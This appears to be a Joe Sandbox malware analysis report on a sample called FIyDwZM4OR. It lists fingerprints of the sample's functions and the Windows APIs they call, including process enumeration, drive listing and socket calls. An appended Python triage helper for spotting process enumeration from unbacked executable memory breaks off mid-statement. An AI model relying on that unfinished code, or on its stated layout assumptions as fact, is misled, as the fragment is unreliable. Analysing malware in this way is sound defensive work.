                                                              • Opcode Fuzzy Hash: 09d292024cf244b99b4b1d5a44dc76390f92c6cf083059753fc026c3fd56397f
                                                              • Instruction Fuzzy Hash: D131C4E715C210BEB606C1816B54AFB6BAEE6CB730B32802BF407D2582D3984F4A1231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: b37a6702d141ef6995a5a8d7c5f68312130672ab4466640d2401a2dd3122bf61
                                                              • Instruction ID: 581a6803ff974cd46d5a18d3d663807f3d8f42ffc9b5cce9b52d1366178e7e5b
                                                              • Opcode Fuzzy Hash: b37a6702d141ef6995a5a8d7c5f68312130672ab4466640d2401a2dd3122bf61
                                                              • Instruction Fuzzy Hash: 232162EB16C111BEB109C1816B54EFB6AEFE6CF730B328427F407D1686D7980E491235
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d664ce9560d6178c51e083b3fd24c43ec2c464b4ac3aa9f6545fb93459a29185
                                                              • Instruction ID: cfcdef4320970d424f172c41a61650709a9868f6920a2d223bafd5393807756c
                                                              • Opcode Fuzzy Hash: d664ce9560d6178c51e083b3fd24c43ec2c464b4ac3aa9f6545fb93459a29185
                                                              • Instruction Fuzzy Hash: C82106F712C210AEB606C5916B54AFA6BAEE6CB730B32846AF406D2582D35C0E4E4231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: c2c4b102f90c89938cee4dff69d50a6a7ee84081c045623c56acba7042653d6c
                                                              • Instruction ID: abdcb662eab0babc5327415407e06e0a2233bc8f081b8041f482cf77b9ca365b
                                                              • Opcode Fuzzy Hash: c2c4b102f90c89938cee4dff69d50a6a7ee84081c045623c56acba7042653d6c
                                                              • Instruction Fuzzy Hash: 6821C3EB22D211BEB205C1912B14EFBABAEE1CB730B36C43AF407D1546D3984E4E5231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 148895a2cb20f994e99962bab2ea97a85d216b85a30893b854daaa52c3a22bf5
                                                              • Instruction ID: 10b1f2ebddabe41f23ec93e350cc33b5aea1702a88acc5ce68bbdc7f114e8849
                                                              • Opcode Fuzzy Hash: 148895a2cb20f994e99962bab2ea97a85d216b85a30893b854daaa52c3a22bf5
                                                              • Instruction Fuzzy Hash: 6E11B1FB26C221BEB205C5912B14AFA6BEEE6CB730B32843BF407D1546D3980E4D1135
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: df54c99d73134800e77e5bca2bee3fb7e36b2ce7273e381183df51c01525e97b
                                                              • Instruction ID: 4716dd57dca2de4c0f8659792d4d377bf0d780ba32b70547410c4903c6322b16
                                                              • Opcode Fuzzy Hash: df54c99d73134800e77e5bca2bee3fb7e36b2ce7273e381183df51c01525e97b
                                                              • Instruction Fuzzy Hash: 3911B4FB25C260BEB605C5916B14AFB6BAED6CB730B35C42BF406D1541D3980E4E1231
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 46c8279ae901a93af634735b7e54941d8540f4650cefa67a82aa9af21e4f861e
                                                              • Instruction ID: 3c7036234c3a73980466da98654957f881b47203f3a627e28fe65f1c4eb47e17
                                                              • Opcode Fuzzy Hash: 46c8279ae901a93af634735b7e54941d8540f4650cefa67a82aa9af21e4f861e
                                                              • Instruction Fuzzy Hash: DC1173EB26C211BEB205C5916B54AFA6BAEE6CB730B31C437F407D2541D3984E491135
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: fc15a4c3500c89b8af74b39ba74d3b5cb25f3b028ec80782286a6d048a58ac26
                                                              • Instruction ID: d2c4d5c658ca3551fa2f2946fae54ca6273f266fa5c9baaee788d2bce0c791b3
                                                              • Opcode Fuzzy Hash: fc15a4c3500c89b8af74b39ba74d3b5cb25f3b028ec80782286a6d048a58ac26
                                                              • Instruction Fuzzy Hash: E8D05E32A292313B89306A9A7C48C4B6BA8DDC6F60F060C69F98577204E1309D0983F2
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00F5B29E,?,00000000,?,?), ref: 00F5B0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00F43C41,00000000), ref: 00F5B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: 190b96d89ede1b79fb79631fbb76b96bb1234de8c6b20cf6797f559aca098336
                                                              • Instruction ID: 5b00794d929f3ec06d1ff79ae4a7dba04212f5525131c1fff647089608eed758
                                                              • Opcode Fuzzy Hash: 190b96d89ede1b79fb79631fbb76b96bb1234de8c6b20cf6797f559aca098336
                                                              • Instruction Fuzzy Hash: 360128327042009BCA205A288844F6BB399FF88375F140B14FE79931D1D726ED04A792
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 5226368d33a24939e159e749d6fc6497b81ef70c8e08bad3180b829fdc20aac8
                                                              • Instruction ID: 123593703aab72811dfbe08932223fcf78838cc6af391ef5e963ae9edb83786c
                                                              • Opcode Fuzzy Hash: 5226368d33a24939e159e749d6fc6497b81ef70c8e08bad3180b829fdc20aac8
                                                              • Instruction Fuzzy Hash: BE9113EB26C321BD720A95416B549FB677EE6CB770B32842AF803D6582E3D44E499071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 738399f6e06dec870124c0cf0ffad70d65c240a07225f9efc43841ec066569ec
                                                              • Instruction ID: 87c5f3d15bb029d2e225808d557722be4dcd431b2ad683df2be11e83e355d7c8
                                                              • Opcode Fuzzy Hash: 738399f6e06dec870124c0cf0ffad70d65c240a07225f9efc43841ec066569ec
                                                              • Instruction Fuzzy Hash: CC81C1EB26C321BD720A95812B649FB667EE5CB770B32843AF807D6582E3D44E4D9071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: aee5e4dcf369a6b46d30d120971b3b6a79c7d51910611d6555c1f1a68b5e473e
                                                              • Instruction ID: 1d3785360d3d6886498fbc4916c15a9d7e2685bae89489698c0ea84eae7b196f
                                                              • Opcode Fuzzy Hash: aee5e4dcf369a6b46d30d120971b3b6a79c7d51910611d6555c1f1a68b5e473e
                                                              • Instruction Fuzzy Hash: 2781C0FB26C321BD720A91816B649FB677EE5CB770B32843AF807D6582E3D44E499071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: a7e7ecf38ae32b7adbf48e785d35e49a687003a816531a365ddca20d3b704313
                                                              • Instruction ID: 45c1ecc0e4387cbe331ea9ce15dbe576779d2ada92f87b6f07dceb427c7bf390
                                                              • Opcode Fuzzy Hash: a7e7ecf38ae32b7adbf48e785d35e49a687003a816531a365ddca20d3b704313
                                                              • Instruction Fuzzy Hash: A181D2EB26C321BD720A91816F649FB677EE5CB770B32843AF807D6582E3D44E499071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7170d0b2d6517f7a047ba8c1410d55d00d87d924fb2a77187e1e6bc876a2b319
                                                              • Instruction ID: 48048c2fec1bc79b91b2826e170ce5afc7813dd096ef5d05974ffda1b03dfa1c
                                                              • Opcode Fuzzy Hash: 7170d0b2d6517f7a047ba8c1410d55d00d87d924fb2a77187e1e6bc876a2b319
                                                              • Instruction Fuzzy Hash: 1771C0EB26C321BD720A91812F649FB677EE5CB770B32843AF807D6582E3D44E499071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: ac193b1fcb1002a93fb1973f4d24d3ffda9abab27fff01e4ae2353238cf6e034
                                                              • Instruction ID: d13c50d29b8fe2a45d737eeb4f8a47dab1c1c84e93b1bcf186661d568100f70f
                                                              • Opcode Fuzzy Hash: ac193b1fcb1002a93fb1973f4d24d3ffda9abab27fff01e4ae2353238cf6e034
                                                              • Instruction Fuzzy Hash: 1C71D1EB26C321BD720A95812F649FB677EE5CB730B32843AF807D6582E3D44E499071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 796cc57c9c721b90d50ecacbf18dbafc942ca6448a0afe422c2881399b271d17
                                                              • Instruction ID: 51f388b1385b762b2cb87de5853bba54ebc95f091a5664db6fb12bd753099bed
                                                              • Opcode Fuzzy Hash: 796cc57c9c721b90d50ecacbf18dbafc942ca6448a0afe422c2881399b271d17
                                                              • Instruction Fuzzy Hash: 6271D2EB26C321BD720A91812F649FB677EE5CB770B32843AF807D6582E3D44E499071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: a52ba96426d0896a246fc196742239f21b0705200c0aa434215d698fff7ca72b
                                                              • Instruction ID: 429d406f33bb8a0ce4dfcebbe17f17e975db429ad5d3ab497c9b85a5f66b24d3
                                                              • Opcode Fuzzy Hash: a52ba96426d0896a246fc196742239f21b0705200c0aa434215d698fff7ca72b
                                                              • Instruction Fuzzy Hash: 5C71D2EB26C321BD720A95815F649FB6B7EE5CB730B32843AF807D6582E3C44E499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09d640544bb88351d8353b8335bb04b01b5156da0e28314fe3c20a3ef9e11b20
                                                              • Instruction ID: dfc9b256ead64c92eb008d8ff1b29c7b8007a9f4bb3ee6e66e1032591bead45b
                                                              • Opcode Fuzzy Hash: 09d640544bb88351d8353b8335bb04b01b5156da0e28314fe3c20a3ef9e11b20
                                                              • Instruction Fuzzy Hash: C361C2EB26C321BD720A91816F649FB677EE5CB730B32843AF807D6582E3D44E499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1762ec12b75cd9f8dcaaf7e1e2cd93b43f61892e33104b58f9e95e7dd93eaa2f
                                                              • Instruction ID: a438d10ef4f8e79c9715e9bbe70f26570d90d479fb6a90922e19e71f0fb5382a
                                                              • Opcode Fuzzy Hash: 1762ec12b75cd9f8dcaaf7e1e2cd93b43f61892e33104b58f9e95e7dd93eaa2f
                                                              • Instruction Fuzzy Hash: 7861E6FB16C119BDB29AA1815B54AF6672EE3CB730B328436F803D6682E3C54F4D5871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bfac7d9a4db8fca7ef2f3e8592a54fda5b731b5983611eed6a452233416f5b87
                                                              • Instruction ID: 7f15e63ca54a095b052fb40ec33d6d826d896038c9b00490f31f93fe8182157b
                                                              • Opcode Fuzzy Hash: bfac7d9a4db8fca7ef2f3e8592a54fda5b731b5983611eed6a452233416f5b87
                                                              • Instruction Fuzzy Hash: D76107FB16C119BD718AA1415F549F66A2EE7CB730B328426F803D66C2E3C44F4D1871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 344f6794a31e6b85f9841d106acd9ed654fb13a7172ee55c5611e16c5d3ffb9e
                                                              • Instruction ID: 5594e660e02746d4d288d4a4b58a5d7582b43bbca8cd71213aad3f36e741078f
                                                              • Opcode Fuzzy Hash: 344f6794a31e6b85f9841d106acd9ed654fb13a7172ee55c5611e16c5d3ffb9e
                                                              • Instruction Fuzzy Hash: E461D2FB26D321BD720A91812B649FB667EE5CB730B32843AF807D6582E3D40A499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 222e1f56b76b91a0f4fddd0313f47803bcdf7dc43f1d8536ef4832ab44903de4
                                                              • Instruction ID: 5c471b2e205b2d6655e4207e4237a4e4debe07e600e5cd8aedac7d13ad0a5c4c
                                                              • Opcode Fuzzy Hash: 222e1f56b76b91a0f4fddd0313f47803bcdf7dc43f1d8536ef4832ab44903de4
                                                              • Instruction Fuzzy Hash: 3451D5FB26C119BD719AA1815F54AF6666EE3CB730B328436F803D6682E3C44B4D1871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea51304ef9995b950d6ebabe09be1074ad37cc18127a8e33983bb21ac395c0c8
                                                              • Instruction ID: 1fd62226f58e781218390c79fdb526610ad1b2b91228e4982f463284946d875b
                                                              • Opcode Fuzzy Hash: ea51304ef9995b950d6ebabe09be1074ad37cc18127a8e33983bb21ac395c0c8
                                                              • Instruction Fuzzy Hash: FB51D1FB26C321BD720A95811B649FB667EE6CB730B32843AB807D65C2E3D44E499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 705205d9050763dff7821d5a1953d71e45129f566d58b253518db9a9a91a3ce3
                                                              • Instruction ID: 3a0e25ffbfb6358f61a37d9e4fd5c45b9081745eccfbf84303de5f4125b47c69
                                                              • Opcode Fuzzy Hash: 705205d9050763dff7821d5a1953d71e45129f566d58b253518db9a9a91a3ce3
                                                              • Instruction Fuzzy Hash: E551C5EB26D321BD720A91412B649FB667EE5CB730B32843AB807D65C2E3D40E499071
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7e9933072c17bbb71d72dadece4e3721ebf217272c3caeec259fde7a4573526
                                                              • Instruction ID: 2f0bb84f90e10520c51d896a579c61340eee00279119914146d4ac02b280b813
                                                              • Opcode Fuzzy Hash: e7e9933072c17bbb71d72dadece4e3721ebf217272c3caeec259fde7a4573526
                                                              • Instruction Fuzzy Hash: 5A51D6FB26C129BD719AA1815F54AF6676EE3CB730B328426F803D6682E3C44F4D1871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 699d7c0a9f1a08eddbaef0754d5491e2d65ca7b01bba9996c78695274b3d037d
                                                              • Instruction ID: 5d20b8b46451b5eb2778d30b410a46feb598eda17f3b3bbe5a89394cccdcc630
                                                              • Opcode Fuzzy Hash: 699d7c0a9f1a08eddbaef0754d5491e2d65ca7b01bba9996c78695274b3d037d
                                                              • Instruction Fuzzy Hash: 7E51C5FB26D321BD720A91416B649FB667EE5CB730B32843AF807D65C2E3D40E499071
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 90ebbf402c6acd85aa4d690adefeade6ac271f31286d7dc5e90c8f38f7975533
                                                              • Instruction ID: 76767d30058f401ebf34c054bbbf87c5a3c949f180ffe41c630d3719cb3c6121
                                                              • Opcode Fuzzy Hash: 90ebbf402c6acd85aa4d690adefeade6ac271f31286d7dc5e90c8f38f7975533
                                                              • Instruction Fuzzy Hash: 3751A7FB1AC129BD719AA1855F54AF6676EE3CB730B328426F803D6682E3C44F4D1871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34857c53bcc4996a56012bb41ce1232d5275978a3b3f6f3b54a85bd863c3bb7d
                                                              • Instruction ID: 691ee5aca05fabf0ff253f08995a21b339c6c97b9f13536fc14e7fe4aa3416e5
                                                              • Opcode Fuzzy Hash: 34857c53bcc4996a56012bb41ce1232d5275978a3b3f6f3b54a85bd863c3bb7d
                                                              • Instruction Fuzzy Hash: 7151C7E726D321BD720A91812B649FB6B7EE5CF730B32843AF807D65C2E3C44A499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3da7ebb15e270a271eb91999b41257f636c70d35c1758feab1f142ac8dc2bc08
                                                              • Instruction ID: 8abfefd8ac62afc193878c455d4554013a764b468421fa0470c1d801a9944099
                                                              • Opcode Fuzzy Hash: 3da7ebb15e270a271eb91999b41257f636c70d35c1758feab1f142ac8dc2bc08
                                                              • Instruction Fuzzy Hash: A451E5FB1AC129BD719BA1415F54AF6672EE7CB330B32802AB803D6682E3C54F4D5871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a9dbe59e46a90c6571cf0f81422c9cab652a08ea018e3e52a3c21e04f115a83
                                                              • Instruction ID: 3db23fdca6e96bf702b527c57e3366d5032c99b594e36f69b770eb6d83414805
                                                              • Opcode Fuzzy Hash: 6a9dbe59e46a90c6571cf0f81422c9cab652a08ea018e3e52a3c21e04f115a83
                                                              • Instruction Fuzzy Hash: 3B5107E726D321BD720A91415B649F76B7EE6CF330B32803AF803D6682E3C44E899171
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 8c3a7c87d53bd52bfe9204ca6661e43979af6813112457d53aae01b128907f4d
                                                              • Instruction ID: c50ecf43d728826a6a2a23730cd7cfd7b98a684301b495ed2acaf98233d92fdd
                                                              • Opcode Fuzzy Hash: 8c3a7c87d53bd52bfe9204ca6661e43979af6813112457d53aae01b128907f4d
                                                              • Instruction Fuzzy Hash: 3651C3E726D321BD720A95811B649FB6B7EE5DF770B32803AB403D65C2E7840A499171
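The function records above are the Joe Sandbox IDA plugin's per-function fingerprints; the only API references they carry in this section are Process32FirstW (ref 071703FE, in the 07170000 dump) and Process32NextW (ref 0718040C, in the 07180000 dump), both from regions marked "based on PE: false". The following triage helper is an added example, not code from the report or from Joe Sandbox: it parses these records, decodes the .sdmp name into region attributes, and flags regions that do Toolhelp process enumeration from unbacked private RWX memory. Two assumptions are mine and not stated on the page: that the .sdmp name fields are pid-index, stage, snapshot id, base, protect, state, type, reserved, and that protect/state/type carry MEMORY_BASIC_INFORMATION values (0x40 = PAGE_EXECUTE_READWRITE, 0x20000 = MEM_PRIVATE). The embedded sample is constructed from three records copied from this page with the lines the parser does not need removed.

```python
"""Triage helper for Joe Sandbox 'Memory Dump Source' function records (added example)."""
import re
from collections import defaultdict

# Assumption (not documented on the page): .sdmp names are laid out as
# <pid idx>.<stage>.<snapshot>.<base>.<protect>.<state>.<type>.<reserved>.sdmp
# and protect/type hold MEMORY_BASIC_INFORMATION flag values.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
TOOLHELP = {"CreateToolhelp32Snapshot", "Process32First", "Process32FirstW",
            "Process32Next", "Process32NextW"}

SDMP_RE = re.compile(
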